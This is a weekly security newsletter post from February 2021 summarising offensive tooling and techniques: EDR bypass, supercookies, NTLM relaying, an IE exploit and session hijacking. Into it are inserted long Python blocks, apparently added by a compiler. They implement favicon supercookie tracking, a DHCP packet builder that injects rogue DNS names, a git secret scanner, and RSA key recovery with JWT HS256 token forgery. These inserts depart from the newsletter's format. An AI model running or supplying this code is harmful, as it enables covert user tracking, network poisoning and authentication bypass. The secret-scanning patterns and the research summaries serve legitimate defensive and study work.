Last Week in Security (LWiS) - 2021-02-08

An amazing payload generator (@Tyl0us), DynamicWrapperEx for COM fun (@am0nsec), Skype link spoofing (@mrd0x), getting into exploit dev (@dayzerosec), automated recon (@DhiyaneshDK), Relaying 101 (@theluemmel), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-02-01 to 2021-02-08.

News

Techniques

  • Endpoint Detection and Response: How Hackers Have Evolved. This blog post is so good it has a second part. It goes over user-mode hooking and direct syscalls, and introduces some less common bypasses: side-by-side loading instead of process injection, and the use of code signing and spoofed file attributes via syso files. The ScareCrow tool that automates all of this is well done and can even produce phishing-ready one-liners or a macro payload.
  • supercookie uses favicons to assign a unique identifier to website visitors. Unlike traditional tracking methods, this ID is stored almost persistently and cannot easily be cleared by the user. The tracking works even in the browser's incognito mode and is not cleared by flushing the cache, closing the browser, restarting the system, using a VPN, or installing ad blockers. Scary stuff. You can stand up your own tracking instance with the open-sourced backend.
  • Microsoft Remote Desktop Web Access Authentication Timing Attack. The combination of the Active Directory domain being returned in an RPC response and a timing side channel that discloses valid usernames lets a remote attacker with no prior knowledge of the target enumerate valid Active Directory usernames using only RDWeb.
  • Abusing Google Chrome extension syncing for data exfiltration and C&C. The Chrome Sync feature lets a decent amount of data be exfiltrated from an infected browser, and because extensions can snoop on every page, Chrome extensions are a natural attack vector (think OAuth tokens, cookies, etc). This has been happening for years.
  • DynamicWrapperEx – Windows API Invocation from Windows Script Host. This blog post covers some basics of COM, how to leverage OLE Automation, the x64 standard calling convention, registration-free activation, and some of the limitations and security considerations around the use of the new tool published with the post.
  • Spoofing and Attacking With Skype. Tampering with requests to Skype allows for the creation of some pretty serious social engineering payloads.
  • Injecting Rogue DNS Records Using DHCP. Some environments automatically create DNS entries from DHCP host names, which are client-controlled. How can this be used? From the post: "The first step would be to launch Responder in analysis mode (no poisoning) and listen for hosts broadcasting queries for hosts that they can’t resolve. Next, pick the most common one, inject a DNS record with the method above, and wait for an inbound connection from the querying system. If that account has a weak password, you might be able to crack it or potentially forward it using NetNTLMRelayX."
  • Getting Started with Exploit Development. This is a good collection of resources as well as introduction to the topic.
  • Recon with Me !!!. Using some really nice "Unix philosophy" tools, this post shows how to construct your own continuous monitoring solution, for bug bounties or for blue teams to run against their own attack surface.
  • Relaying 101. Need a quick overview of the many ways relaying can be used in a Windows environment? @theluemmel has you covered, with a healthy dose of self-deprecating memes for good measure.
  • In-depth dive into the security features of the Intel/Windows platform secure boot process. If you've ever wondered what really happens when you boot an Intel-based Windows computer with Secure Boot enabled, this post shows you in great detail.
  • Reverse engineering Emotet – Our approach to protect GRNET against the trojan. This post is chock full of meaty reverse engineering detail. If you were ever curious how major botnets went from email opens to trojan'd machines without tripping AV/EDR, this post is for you.
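The favicon trick behind supercookie, as an added model written for this summary (it is not code from the supercookie project). The server exposes one favicon route per bit of the visitor ID. In the write phase it returns an icon only on the routes whose bit is set, so the browser caches exactly those. In the read phase it answers every request with 404, which leaves the cache untouched, and simply watches which routes the browser still asks for: a cached bit is never requested, a missing bit is. The browser's favicon cache is modelled as a set, and the ID width (`ID_BITS`), the route naming and the "0 means unknown visitor" convention are assumptions of this example, not details of the real implementation.

```python
from typing import Optional, Set

ID_BITS = 32  # width of the visitor ID; an assumption of this example


class Server:
    """Tracking backend: hands out IDs and answers one favicon route per bit."""

    def __init__(self, id_bits: int = ID_BITS) -> None:
        self.id_bits = id_bits
        self._next_id = 1  # 0 is reserved: an empty cache reads back as 0

    def assign_id(self) -> int:
        vid, self._next_id = self._next_id, self._next_id + 1
        return vid

    def serve(self, route: int, writing: Optional[int]) -> int:
        """HTTP status for favicon route <route>.

        Read phase (writing is None): always 404, so the cache is untouched and
        the server only learns which routes the browser had to request.
        Write phase (writing is an ID): 200 with an icon iff that bit is set.
        """
        if writing is None:
            return 404
        return 200 if (writing >> route) & 1 else 404


class Browser:
    """Stand-in for the favicon cache: a route is cached once it returned 200."""

    def __init__(self) -> None:
        self.cache: Set[int] = set()

    def load_favicons(self, server: Server, writing: Optional[int]) -> Set[int]:
        """Walk every favicon route once; return the routes actually fetched."""
        requested = set()
        for route in range(server.id_bits):
            if route in self.cache:
                continue  # cached icon is reused, no request leaves the browser
            requested.add(route)
            if server.serve(route, writing) == 200:
                self.cache.add(route)
        return requested


def read_id(server: Server, browser: Browser) -> int:
    """Routes that were NOT requested are cached, i.e. their bit is 1."""
    requested = browser.load_favicons(server, writing=None)
    return sum(1 << r for r in range(server.id_bits) if r not in requested)


def write_id(server: Server, browser: Browser, vid: int) -> None:
    """Serve icons so that the cache ends up encoding vid."""
    browser.load_favicons(server, writing=vid)


def track(server: Server, browser: Browser) -> int:
    """One visit as the backend sees it: read; if nothing is cached, assign and write."""
    vid = read_id(server, browser)
    if vid == 0:
        vid = server.assign_id()
        write_id(server, browser, vid)
    return vid
```

Two properties of the model are worth noticing. Nothing here touches cookies, localStorage or the HTTP cache, which is why "clear site data" does not affect it in a browser that keeps the favicon cache separate. And the server can only ever add icons, never evict one, so an ID written once cannot be rewritten for that cache; the model writes only for first-time visitors for that reason.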
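The DHCP-to-DNS procedure quoted above, as an added example written for this summary (not code from the post, from Responder or from any DHCP client). It tallies the names that hosts broadcast for in a constructed Responder Analyze-mode log, picks the most common one that a DNS record could actually satisfy, and builds a DHCPREQUEST whose Host Name (option 12) and Client FQDN (option 81) carry that name, then parses the packet back to check what it will send. Assumptions: the log line format (compare against your own Responder.log), that the DHCP server's dynamic-update settings honour one of those two options, and that names on the Windows DNS global query block list (wpad, isatap by default) are skipped because the server will not answer for them even if a record exists.

```python
import re
import socket
import struct
from collections import Counter
from typing import Dict, Optional

# Constructed sample in the style of Responder's Analyze mode output.
SAMPLE_LOG = """\
[Analyze mode: LLMNR] Request by 10.0.0.23 for wpad, ignoring
[Analyze mode: NBT-NS] Request by 10.0.0.23 for FILESRV01, ignoring
[Analyze mode: LLMNR] Request by 10.0.0.41 for filesrv01, ignoring
[Analyze mode: MDNS] Request by 10.0.0.9 for printer-2.local, ignoring
[Analyze mode: LLMNR] Request by 10.0.0.57 for FILESRV01, ignoring
[Analyze mode: NBT-NS] Request by 10.0.0.41 for wpad, ignoring
"""
LINE_RE = re.compile(r"Request by (?P<src>[\d.]+) for (?P<name>[^\s,]+), ignoring")

# Default entries of the Windows DNS global query block list: never served.
GQBL = {"wpad", "isatap"}
DHCP_MAGIC = b"\x63\x82\x53\x63"


def unresolved_names(log: str) -> Counter:
    """Tally names clients fell back to broadcast for (case-folded)."""
    names: Counter = Counter()
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if m:
            names[m.group("name").lower()] += 1
    return names


def pick_target(names: Counter) -> Optional[str]:
    """Most-requested single-label name that a DNS record can actually satisfy."""
    for name, _ in names.most_common():
        if name not in GQBL and "." not in name:
            return name
    return None


def _opt(code: int, data: bytes) -> bytes:
    return bytes([code, len(data)]) + data


def dhcp_request(mac: bytes, hostname: str, requested_ip: str, server_ip: str,
                 xid: int = 0x3903F326) -> bytes:
    """DHCPREQUEST (selecting state) carrying `hostname` in options 12 and 81."""
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        1, 1, 6, 0, xid, 0, 0x8000,          # BOOTREQUEST, Ethernet, hlen 6, hops, xid, secs, broadcast flag
        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,   # ciaddr, yiaddr, siaddr, giaddr
        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)  # chaddr, sname, file
    options = (_opt(53, b"\x03")                                # DHCPREQUEST
               + _opt(50, socket.inet_aton(requested_ip))       # address from the OFFER
               + _opt(54, socket.inet_aton(server_ip))          # server identifier from the OFFER
               + _opt(12, hostname.encode())                    # Host Name
               + _opt(81, b"\x01\x00\x00" + hostname.encode())  # Client FQDN, S=1: server registers A
               + _opt(55, bytes([1, 3, 6, 15]))                 # parameter request list
               + b"\xff")
    return header + DHCP_MAGIC + options


def dhcp_options(packet: bytes) -> Dict[int, bytes]:
    """Parse the options area of a DHCP packet (ours or one from a capture)."""
    if packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet")
    opts, i = {}, 240
    while i < len(packet) and packet[i] != 255:
        if packet[i] == 0:          # pad
            i += 1
            continue
        code, length = packet[i], packet[i + 1]
        opts[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def send_broadcast(packet: bytes) -> None:
    """Broadcast to the server port; binding 68 needs root. Not exercised offline."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.bind(("", 68))
        s.sendto(packet, ("255.255.255.255", 67))
```

A complete exchange still needs the DISCOVER/OFFER round first (the `requested_ip` and `server_ip` come from the OFFER); in practice a stock DHCP client configured with the chosen host name does all of that for you, and this builder mainly shows which bytes the server acts on. On the defensive side, the same parser run over a capture of DHCP traffic, flagging option 12/81 values that collide with names your DNS already serves or that keep changing for one MAC, is a cheap detection.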

Tools and Exploits

  • raptor_infiltrate20 contains multiple exploits (some 0days?) for Solaris 10 and 11. The talk is worth checking out as well. Even modern operating systems have some dumb logic bugs left.
  • PatrowlHears is an advanced and real-time Vulnerability Intelligence platform, including CVE, exploits and threats news. This commercially developed continuous monitoring system is now open source (AGPL)!
  • Forrest_Orr_CVE-2020-0674_32bit.html. This is a Microsoft Internet Explorer 8-11 32-bit use-after-free exploit. It targets 32-bit IE, unlike the 64-bit-only Metasploit module, which matters because IE runs as 32-bit by default on Windows 7 and 8.1. As with everything Forrest Orr does, it's a work of art and bypasses DEP, ASLR, and EMET 5.5 (EAF, EAF+, stack pivot protection, SimExec, and CallerCheck).
  • squealer scans a local git repository for secrets leaked deep within the commit history, using regular expressions. Use it on offensive engagements or as part of your CI to keep secrets out of git repositories.
  • Awesome_Firebase_DomainFront is a repository for a Firebase domain fronting application. This is a demonstration application that uses Firebase Cloud Functions to front traffic, and you can use arbitrary *.web.app domains. See the blog post for more information.
  • SharpSMBSpray sprays a hash over SMB to check for local administrator access. Where SharpMapExec needs a list of computer names, SharpSMBSpray takes a network range.
  • rsa_sign2n contains experimental code to calculate RSA public keys based on two known message-signature pairs, code to extract and generate RSA and HMAC signatures for JWTs, and proof-of-concept code to exploit the CVE-2017-11424 key confusion vulnerability in pyJWT, without knowing the public key of the target (all details here).
  • Shield - not new, but with a shiny new EndpointSecurity entitlement from Apple it can be easily installed. More information on this injection attack protection tool here.
  • SharpRelay automates loading the (signed) WinDivert driver and communicating with it to pull off an NTLM relay remotely through a Cobalt Strike beacon. If you don't want to load a driver, InveighZero may do what you need.
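The kind of scan squealer performs, as an added example written for this summary (not squealer's own code or rule set). It walks `git log -p` output, attributes every added line to the commit and file that introduced it, and applies a small rule list: fixed-prefix patterns (an AWS access key ID, a PEM private-key header) need no further check, while a generic `secret|token|password=...` rule is gated on Shannon entropy so that placeholders such as `xxxxxxxx` are dropped. The git log below is constructed for the example, the AWS key in it is the documented `AKIAIOSFODNN7EXAMPLE` placeholder, and the 3.0-bit entropy threshold is an assumption you would tune against your own repositories.

```python
import math
import re
from dataclasses import dataclass
from typing import List

# (rule name, regex with the secret in group 1, minimum Shannon entropy of that group)
RULES = [
    ("aws-access-key-id", re.compile(r"\b(AKIA[0-9A-Z]{16})\b"), 0.0),
    ("private-key-block", re.compile(r"(-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----)"), 0.0),
    ("generic-credential",
     re.compile(r"(?i)(?:secret|token|password|passwd|api_?key)\w*\s*[:=]\s*[\"']?([A-Za-z0-9_\-/+=]{16,})"),
     3.0),
]

# Constructed `git log -p` output: two commits, three files.
SAMPLE_GIT_LOG = """\
commit 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b
Author: dev <dev@example.com>

    add deploy config

diff --git a/deploy/config.env b/deploy/config.env
--- /dev/null
+++ b/deploy/config.env
@@ -0,0 +1,3 @@
+AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
+DB_PASSWORD=changeme
+API_KEY=xxxxxxxxxxxxxxxxxxxxxxxx
diff --git a/deploy/id_rsa b/deploy/id_rsa
--- /dev/null
+++ b/deploy/id_rsa
@@ -0,0 +1,2 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+(key body omitted in this constructed sample)
commit 9f8e7d6c5b4a39281706f5e4d3c2b1a0ffeeddcc
Author: dev <dev@example.com>

    rotate slack token

diff --git a/src/client.py b/src/client.py
--- a/src/client.py
+++ b/src/client.py
@@ -1 +1 @@
-SLACK_TOKEN = "old-token-placeholder"
+SLACK_TOKEN = "qH7vR2kLm9XsT4pWz8NdC1yB6fJ3gK5e"
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for a repeated character, log2(len) if all differ."""
    if not s:
        return 0.0
    counts = [s.count(c) for c in set(s)]
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts)


@dataclass
class Finding:
    commit: str
    path: str
    rule: str
    secret: str


def scan_git_log(log: str) -> List[Finding]:
    """Scan added lines of a `git log -p` dump; each hit names the introducing commit."""
    findings: List[Finding] = []
    commit = path = ""
    for line in log.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ b/"):
            path = line[6:]
        elif line.startswith("+") and not line.startswith("+++"):
            for rule, regex, min_entropy in RULES:
                for m in regex.finditer(line[1:]):
                    if shannon_entropy(m.group(1)) >= min_entropy:
                        findings.append(Finding(commit, path, rule, m.group(1)))
    return findings
```

Only `+` lines are scanned so that each finding points at the commit that introduced the secret; a later `-` line removing it does not make the value safe, since it is still in history, which is exactly why a tool like this has to look at the full log rather than the working tree. Feed it `git log -p --all` to cover every branch.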
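The two ideas rsa_sign2n combines, as an added example written for this summary (it is not the tool's code). First, recovering the public key from two RS256 tokens: each signature satisfies s^e = m + k*n, where m is the PKCS#1 v1.5 padded digest of the signing input, so n divides gcd(s1^e - m1, s2^e - m2) and only a small cofactor gcd(k1, k2) has to be stripped. Second, algorithm/key confusion of the kind behind CVE-2017-11424: a verifier that takes `alg` from the token header and feeds the same key material into HS256 will accept a token HMACed with the recovered public key. Assumptions: the demo key uses e=3 so the gcd runs in milliseconds in pure Python (real keys use 65537, for which the tool relies on gmpy2; the candidate loop here would be very slow for that exponent); `confused_verify` is a simplified model of the vulnerable behaviour, not pyJWT's code; and the server is assumed to hold its key as an SPKI PEM ("BEGIN PUBLIC KEY"), because the HMAC secret must be byte-for-byte the serialization the server loads, which an attacker has to guess.

```python
import base64, hashlib, hmac, json, math, random, textwrap

SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # RFC 8017 prefix

def b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def is_prime(n: int, rng: random.Random, rounds: int = 16) -> bool:
    """Miller-Rabin, enough for a demo key."""
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def make_key(bits: int = 512, e: int = 3, seed: int = 7):
    """Demo RSA key (n, e, d); primes are chosen with gcd(p-1, e) == 1."""
    rng, primes = random.Random(seed), []
    while len(primes) < 2:
        p = rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        if (p - 1) % e and p not in primes and is_prime(p, rng):
            primes.append(p)
    p, q = primes
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))

def pkcs1_pad(msg: bytes, k: int) -> int:
    """EMSA-PKCS1-v1_5 with SHA-256; k is the modulus size in bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def signing_input(alg: str, payload: dict) -> str:
    parts = ({"alg": alg, "typ": "JWT"}, payload)
    return ".".join(b64url(json.dumps(x, separators=(",", ":")).encode()) for x in parts)

def sign_rs256(payload: dict, n: int, d: int) -> str:
    k = (n.bit_length() + 7) // 8
    data = signing_input("RS256", payload)
    return data + "." + b64url(pow(pkcs1_pad(data.encode(), k), d, n).to_bytes(k, "big"))

def recover_public_key(tok1: str, tok2: str, candidates=(3, 65537)):
    """(n, e) from two RS256 tokens of one key, or None if no candidate e fits."""
    pairs = []
    for tok in (tok1, tok2):
        h, p, s = tok.split(".")
        sig = b64url_decode(s)
        pairs.append((pkcs1_pad(f"{h}.{p}".encode(), len(sig)), int.from_bytes(sig, "big")))
    k = len(sig)
    for e in candidates:
        g = math.gcd(pow(pairs[0][1], e) - pairs[0][0], pow(pairs[1][1], e) - pairs[1][0])
        for f in range(2, 10000):  # strip cofactors while s^e == m still holds mod g/f
            while g % f == 0 and pow(pairs[0][1], e, g // f) == pairs[0][0] % (g // f):
                g //= f
        if g.bit_length() > 8 * (k - 1) and all(pow(s, e, g) == m % g for m, s in pairs):
            return g, e
    return None

def der(tag: int, body: bytes) -> bytes:
    n = len(body)
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag]) + (bytes([n]) if n < 128 else bytes([0x80 | len(lb)]) + lb) + body

def der_int(x: int) -> bytes:
    b = x.to_bytes((x.bit_length() + 7) // 8, "big")
    return der(0x02, b"\x00" + b if b[0] & 0x80 else b)

def spki_pem(n: int, e: int) -> str:
    """SubjectPublicKeyInfo PEM; assumed to be the form the server loads."""
    rsa_key = der(0x30, der_int(n) + der_int(e))
    alg_id = der(0x30, bytes.fromhex("06092a864886f70d010101") + b"\x05\x00")  # rsaEncryption, NULL
    spki = der(0x30, alg_id + der(0x03, b"\x00" + rsa_key))
    body = "\n".join(textwrap.wrap(base64.b64encode(spki).decode(), 64))
    return f"-----BEGIN PUBLIC KEY-----\n{body}\n-----END PUBLIC KEY-----\n"

def forge_hs256(payload: dict, key_pem: str) -> str:
    """Key confusion: HMAC the token with the *public* key bytes as the secret."""
    data = signing_input("HS256", payload)
    return data + "." + b64url(hmac.new(key_pem.encode(), data.encode(), hashlib.sha256).digest())

def confused_verify(token: str, key_pem: str, n: int, e: int) -> bool:
    """Vulnerable verifier model: alg comes from the header, one key_pem serves both.
    The fix is to pin the expected algorithm server-side and reject everything else."""
    h, p, s = token.split(".")
    alg, sig, data = json.loads(b64url_decode(h))["alg"], b64url_decode(s), f"{h}.{p}".encode()
    if alg == "RS256":
        return pow(int.from_bytes(sig, "big"), e, n) == pkcs1_pad(data, len(sig))
    if alg == "HS256":
        return hmac.compare_digest(sig, hmac.new(key_pem.encode(), data, hashlib.sha256).digest())
    return False
```

The recovery needs no oracle at all, only two tokens the server issued, which is what makes "without knowing the public key of the target" possible; the forged HS256 token then only works if the server really does accept the header's algorithm and really does load the key in the serialization you HMACed with, so in practice the attack is tried with each plausible PEM variant.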

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • necrobrowser is a browser instrumentation microservice written in NodeJS: it uses the Puppeteer library to control instances of Chrome or Firefox in headless and GUI mode. The idea is to feed NecroBrowser with web sessions harvested during phishing campaigns (see Muraena) to quickly perform actions hijacking the victim session.
  • uroboros is a GNU/Linux monitoring tool focused on single processes. This could be a useful first step for dynamic analysis of a Linux binary.
  • Information Security Reference is a very complete resource for all things Information Security.

This post is cross-posted on SIXGEN's blog.